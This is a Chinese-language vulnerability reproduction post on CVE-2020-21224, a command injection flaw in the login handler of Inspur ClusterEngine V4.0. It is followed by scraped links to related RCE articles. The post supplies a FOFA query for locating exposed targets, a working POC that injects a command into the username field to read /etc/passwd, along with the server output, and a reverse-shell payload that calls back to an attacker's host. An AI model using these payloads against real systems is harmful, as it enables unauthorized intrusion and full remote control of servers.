浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224

此文章仅供用于学习研究,严禁用于非法用途,否则后果自负。

漏洞简介

浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行

漏洞影响

浪潮ClusterEngineV4.0

FOFA语法

title="TSCEV4.0"

漏洞复现

登录页面如下

POC

POC测试(出现 root:x:0:0 则存在漏洞)
op=login&username=test`$(cat /etc/passwd)`{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user test does not exist\nerror:1\n"}反弹shell
op=login&username=test`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`

浪潮ClusterEngineV4.0 远程命令执行漏洞 CVE-2020-21224相关推荐

  1. 浪潮 ClusterEngineV4.0 任意命令执行

    目录 漏洞关注点: 漏洞信息 漏洞危害 fofa_dork 漏洞验证 验证POC 修复方案 漏洞关注点: /alarmConfig 漏洞信息 浪潮ClusterEngine集群管理平台是专为浪潮天梭系 ...

  2. ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞

    ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速.兼容而且简单的轻量级国产PHP开发框架.借鉴Struts框架的Action对象,同 ...

  3. php命令执行漏洞利用,ThinkPHP 5.0 5.1远程命令执行漏洞利用分析

    1漏洞利用方式 5.0版本POC(不唯一) 命令执行:? s=index/thinkapp/invokefunction&function=call_user_func_array&v ...

  4. rmi远程反序列化rce漏洞_Oracle WebLogic 反序列化远程命令执行漏洞预警

    报告编号:B6-2019-041901 报告来源:360-CERT 报告作者:360-CERT 更新日期:2019-04-19 0x00 事件背景 2019年4月17日,国家信息安全漏洞共享平台(CN ...

  5. jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞

    ###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...

  6. 远程执行漏洞修复方案_请马上修复!SaltStack远程命令执行漏洞

    [漏洞预警]SaltStack远程命令执行漏洞(CVE-2020-11651.CVE-2020-11652) 2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在 ...

  7. 又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析

    本文讲的是又被野外利用了!新曝光Office产品多个远程命令执行漏洞分析, 早在2015年,FireEye曾发布过两次关于Office的Encapsulated PostScript (EPS)图形文 ...

  8. 详述WebLogic反序列化远程命令执行漏洞的处理过程,云和恩墨技术通讯精选

    各位亲爱的用户/读者朋友们: 为了及时共享行业案例,通告共性问题,达成知识共享和提前预防,我们整理和编辑了<云和恩墨技术通讯>(5月刊),通过对过去一段时间的知识回顾和故障归纳,以期提供有 ...

  9. 用友NC远程命令执行漏洞通告

    用友NC远程命令执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)

最新文章

  1. 在TCP客户端连接成功的回调函数里,无法访问到客户端套接字的明细
  2. linux调用堆栈函数,使用 backtrace 获得 Linux 函数调用栈
  3. 为什么应尽量从列表的尾部进行元素的增加与删除操作?
  4. SQL Server 2008 R2与JDBC连接
  5. (转载)人工智能在围棋程序中的应用——复旦大学附属中学(施遥)
  6. android 高清播放器,高清播放器我要下载-高清播放器 安卓版v9.6.2-PC6安卓网
  7. MATLAB 绘制空间分布图,颜色代表数值(替代ArcGIS)
  8. 手机浏览器 打开 APP,APP 嵌套在了浏览器里,网页跳转app问题
  9. 全球及中国焦磷酸钠行业“十四五”规划建议与创新环境分析报告2022-2028年版
  10. esp笔记(4)esp8266 连接路由器
  11. R语言:修改chart.Correlation()函数绘制相关性图——完美出图
  12. AMD将推出7纳米GPU Vega,专为深度学习和机器学习打造
  13. sqlite3数据库的使用及其对应的API函数接口的使用
  14. cboard企业版源码_CBoard自助BI数据分析产品 v0.4.2
  15. 【学习笔记】STC校验子格编码 syndrome-trellis code
  16. Linux的发音问题
  17. 【嵌入式04.2】STM32F103C8T6的简易流水灯仿真(寄存器实现+STM32CubeMX实现)
  18. 东方博宜OJ 1391 - 【入门】公交卡充值问题?
  19. 专题分纲目录 学习原则
  20. JAVA计算机毕业设计运动会成绩管理系统Mybatis+源码+数据库+lw文档+系统+调试部署

热门文章

  1. 云南初中计算机考试试题,云南省初中学业水平考试信息技术复习+练习题
  2. 【线性代数】矩阵及其特性
  3. BT Controller EDR2/EDR3的调试总结
  4. mysql sdo geometry_Oracle 关于WKT构造SDO_GEOMETRY的问题。详解
  5. 高等代数_第6章:二次型·矩阵的合同
  6. Linux下的超级终端(minicom)
  7. UE4材质03纹理采样及UV
  8. unity3d webplayer打开新窗口
  9. java郎波课后题_(毕业论文)学生日常行为评分系统.doc
  10. xcode ios查看视频是否为hdr